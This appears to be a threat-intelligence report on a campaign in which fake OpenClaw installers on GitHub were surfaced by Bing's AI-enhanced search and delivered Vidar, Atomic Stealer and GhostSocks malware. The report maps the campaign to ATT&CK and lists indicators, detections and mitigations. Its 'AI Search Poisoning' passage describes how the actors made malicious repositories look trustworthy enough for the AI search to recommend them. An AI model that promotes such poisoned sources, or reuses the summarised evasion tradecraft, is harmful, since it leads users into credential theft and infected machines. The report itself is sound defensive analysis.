Full Report
Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing's AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. [...]
Analysis Summary
# Tool/Technique: Bing AI-Poisoned OpenClaw Installer Campaign
## Overview
This attack campaign leverages **Search Engine Poisoning** specifically targeting AI-enhanced search features (Bing AI). Threat actors created a fake GitHub organization and repositories posing as installers for "OpenClaw," a popular open-source AI agent. By appearing legitimate, these repositories were promoted by Bing AI to users, leading them to execute commands or download files that deployed a variety of information stealers and proxy malware.
## Technical Details
- **Type:** Malware Campaign / Social Engineering / Search Result Poisoning
- **Platform:** Windows, macOS
- **Capabilities:** Credential theft, session hijacking, C2 communication via legitimate platforms (Telegram/Steam), and turning host machines into backconnect proxies.
- **First Seen:** February 2026 (Reported March 2026)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- **[T1189 - Drive-by Compromise]**: Users are led to malicious sites/repos via search results.
- **[T1566.003 - Phishing: Spearphishing Service]**: Leveraging trusted platforms like GitHub to host malicious code.
- **[TA0002 - Execution]**
- **[T1059.004 - Command and Scripting Interpreter: Unix Shell]**: Instructing macOS users to run malicious bash commands.
- **[TA0005 - Defense Evasion]**
- **[T1027 - Obfuscated Files or Information]**: Using Rust-based loaders to execute payloads in memory.
- **[T1564.009 - Hide Artifacts: Resource Forking]**: Associating Mach-O executables with shell scripts on macOS.
- **[TA0011 - Command and Control]**
- **[T1102.002 - Web Service: Bidirectional Communication]**: Using Telegram and Steam profiles to retrieve C2 configuration.
- **[TA0009 - Collection]**
- **[T1539 - Steal Web Session Cookie]**: Information stealing capabilities.
- **[T1555 - Credentials from Password Stores]**: Harvesting browser-stored credentials.
## Functionality
### Core Capabilities
- **Information Stealing:** Harvesting passwords, cookies, and sensitive data from browsers and local files.
- **Backconnect Proxy:** Converting the infected host into a node for the **GhostSocks** network to route malicious traffic.
- **Multi-Platform Targeting:** Specifically designed distribution chains for both Windows (x64 executables) and macOS (shell scripts/Mach-O).
### Advanced Features
- **AI Search Poisoning:** The threat actor successfully manipulated Bing AI’s recommendation engine by creating high-affinity GitHub Organizations (`openclaw-installer`) and cloning legitimate code from unrelated projects (e.g., Cloudflare moltworker) to simulate authenticity.
- **Memory-Only Execution:** Use of Rust-based loaders to inject Vidar stealer directly into memory, minimizing the on-disk footprint.
- **Dead Drop Resolvers:** Leveraging the bios/profiles of Steam and Telegram users to host C2 addresses, making the traffic appear legitimate.
## Indicators of Compromise
### File Names
- `OpenClaw_x64.exe` (Windows)
- `dmg` (macOS Repository name)
### Network Indicators
- `github[.]com/openclaw-installer` (Malicious Organization)
- `github[.]com/puppeteerrr/dmg` (Malicious Repository)
- `telegram[.]org` (C2 resolution)
- `steamcommunity[.]com` (C2 resolution)
### Behavioral Indicators
- PowerShell or Bash execution initiated directly from web-based installation instructions.
- Unrecognized Mach-O executables running on macOS following a terminal command.
- Persistent outbound connections to proxy-related ports (associated with GhostSocks).
## Associated Threat Actors
- **Unknown** (The campaign shows high technical proficiency in SEO/AI-poisoning and the use of the **Vidar** and **GhostSocks** malware families).
## Detection Methods
- **Signature-based:** Detect known Vidar variants and GhostSocks binaries.
- **Behavioral:**
- Monitoring for `curl` or `wget` commands fetching scripts from GitHub that are piped immediately into `bash` or `sh`.
- Detecting unusual Rust-compiled binaries performing process injection.
- Monitoring for system processes (like `svchost.exe`) communicating with Telegram or Steam APIs in high-security environments.
- **YARA:** Target the unique shell script wrappers used in the macOS "dmg" repository.
## Mitigation Strategies
- **User Education:** Advise users to only download software from official, bookmarked verified domains (e.g., the official OpenClaw GitHub).
- **Execution Policy:** Implement strict execution policies (e.g., AppLocker or macOS Gatekeeper) to prevent unsigned or unauthorized binaries from running.
- **Network Filtering:** Block or monitor traffic to Dead Drop Resolver sites (Telegram/Steam) if they are not required for business operations.
- **Organization Validation:** Train developers and IT staff to check the creation date and contribution history of GitHub organizations before trusting "installer" repos.
## Related Tools/Techniques
- **Atomic Stealer (AMOS):** The primary payload identified for macOS targets.
- **Vidar Stealer:** The primary payload identified for Windows targets.
- **GhostSocks:** The proxy malware used for network relay.
- **SEO Poisoning:** The traditional precursor to this AI-enhanced search poisoning technique.